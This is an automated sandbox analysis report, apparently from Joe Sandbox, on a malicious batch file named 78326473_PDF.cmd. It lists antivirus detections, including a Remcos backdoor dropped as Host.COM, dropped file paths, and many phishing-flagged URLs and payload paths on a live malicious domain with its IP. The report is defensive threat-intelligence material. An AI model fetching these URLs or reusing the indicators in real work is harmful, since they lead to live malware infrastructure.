suspicious file extension 21->49 29 C:\Users\Public\Libraries\Host.COM, PE32 24->29 dropped 31 C:\Users\Public\kn.exe, PE32+ 27->31 dropped signatures11

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    78326473_PDF.cmd18%ReversingLabsWin32.Trojan.Leonem
    SourceDetectionScannerLabelLink
    C:\Users\Public\Libraries\Host.COM100%AviraHEUR/AGEN.1326062
    C:\Users\Public\Libraries\Host.COM100%Joe Sandbox ML
    C:\Users\Public\Libraries\Host.COM68%ReversingLabsWin32.Backdoor.Remcos
    C:\Users\Public\alpha.exe0%ReversingLabs
    C:\Users\Public\kn.exe0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiL100%Avira URL Cloudphishing
    https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/ya100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/K100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffyagm100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaCompan100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/pQ100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/r100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/yak_100%Avira URL Cloudphishing
    https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/yas_100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/p100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyapQ100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyac_100%Avira URL Cloudphishing
    https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya100%Avira URL Cloudphishing
    https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifyaa100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya;100%Avira URL Cloudphishing
    https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya9m100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/s_100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya.dll100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaU100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaT100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi77100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/k_100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/yapQ100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyaK100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/h9100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/c_100%Avira URL Cloudphishing
    https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya6l100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaF100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/yac_100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/MIEJOHNSONERE/1100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/?100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/;100%Avira URL Cloudphishing
    https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffyaa100%Avira URL Cloudphishing
    https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya9m100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/(100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya100%Avira URL Cloudphishing
    https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgigi-sys/suspendedpage.cgi100%Avira URL Cloudphishing
    https://taksonsdfg.co.in100%Avira URL Cloudphishing
    https://www.veeble.org/contact/0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    taksonsdfg.co.in
    108.170.55.202
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgitrue
      • Avira URL Cloud: phishing
      unknown
      https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffyatrue
      • Avira URL Cloud: phishing
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmpfalse
        high
        https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
          high
          https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiHost.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1922948607.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.0000000000859000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          https://taksonsdfg.co.in/yaHost.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839691740.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLHost.COM, 0000000B.00000003.2483388858.000000000086D000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLasHost.COM, 0000000B.00000003.2440234813.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444396121.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012862554.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2055223478.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.0000000000857000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaCompanHost.COM, 0000000B.00000003.2440234813.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyagmHost.COM, 0000000B.00000003.1922948607.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839691740.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
            high
            https://taksonsdfg.co.in/KHost.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2055223478.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://taksonsdfg.co.in/rHost.COM, 0000000B.00000003.1839691740.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1578286696.0000000000862000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://taksonsdfg.co.in/pQHost.COM, 0000000B.00000003.1747394449.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://taksonsdfg.co.in/yak_Host.COM, 0000000B.00000003.2311946192.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifyaHost.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://taksonsdfg.co.in/yas_Host.COM, 0000000B.00000003.1922948607.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyac_Host.COM, 0000000B.00000003.1839691740.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifyaaHost.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
              high
              https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                high
                https://taksonsdfg.co.in/pHost.COM, 0000000B.00000003.1487958254.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_OvqqzpvffyaHost.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1922948607.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyapQHost.COM, 0000000B.00000003.2530460576.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya9mHost.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya;Host.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
                  high
                  https://taksonsdfg.co.in/s_Host.COM, 0000000B.00000003.1444396121.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705256794.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyaHost.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012862554.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705256794.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1922948607.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1578286696.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RHost.COM, 0000000B.00000003.1839691740.000000000085F000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi77Host.COM, 0000000B.00000003.1401491883.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/k_Host.COM, 0000000B.00000003.2357578707.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012862554.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/yapQHost.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya.dllHost.COM, 0000000B.00000002.2573365210.00000000007DF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaUHost.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaTHost.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyaKHost.COM, 0000000B.00000003.1444396121.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/h9Host.COM, 0000000B.00000003.2269142479.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/c_Host.COM, 0000000B.00000003.1747394449.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya6lHost.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/yac_Host.COM, 0000000B.00000003.1922948607.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/MIEJOHNSONERE/1Host.COM, 0000000B.00000002.2587832957.000000001D9EF000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2587832957.000000001DA5D000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2587832957.000000001DA2B000.00000004.00001000.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaFHost.COM, 0000000B.00000003.1578213645.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://taksonsdfg.co.in/Host.COM, 0000000B.00000003.2398663811.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000088F000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  unknown
                  https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmpfalse
                    high
                    https://taksonsdfg.co.in/?Host.COM, 0000000B.00000003.1401491883.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_OvqqzpvffyaaHost.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://taksonsdfg.co.in/;Host.COM, 0000000B.00000003.2357578707.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
                      high
                      https://taksonsdfg.co.in/(Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya9mHost.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://www.pmail.comHost.COM, Host.COM, 0000000B.00000003.1337851402.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1338107962.000000007F98F000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2589227345.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575784009.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575107446.000000000290A000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgigi-sys/suspendedpage.cgiHost.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://taksonsdfg.co.inHost.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://www.veeble.org/contact/Host.COM, 0000000B.00000003.2398663811.0000000000844000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839562025.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311655958.000000000069B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444396121.0000000000843000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487910197.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012719233.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1658976901.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705162095.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000844000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2484438938.0000000000844000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966265756.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269059652.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787397527.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311676740.0000000000683000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444362085.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098183283.0000000000681000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573219588.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398437375.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966265756.00000000008C7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        108.170.55.202
                        taksonsdfg.co.inUnited States
                        20454SSASN2UStrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1562925
                        Start date and time:2024-11-26 09:37:05 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 4s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:19
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:78326473_PDF.cmd
                        Detection:MAL
                        Classification:mal100.bank.troj.evad.winCMD@22/11@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 60
                        • Number of non-executed functions: 209
                        Cookbook Comments:
                        • Found application associated with file extension: .cmd
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • VT rate limit hit for: 78326473_PDF.cmd
                        TimeTypeDescription
                        03:38:09API Interceptor29x Sleep call for process: Host.COM modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        108.170.55.2026BE4RDldhw.exeGet hashmaliciousDBatLoaderBrowse
                          https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8Get hashmaliciousHTMLPhisherBrowse
                            FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
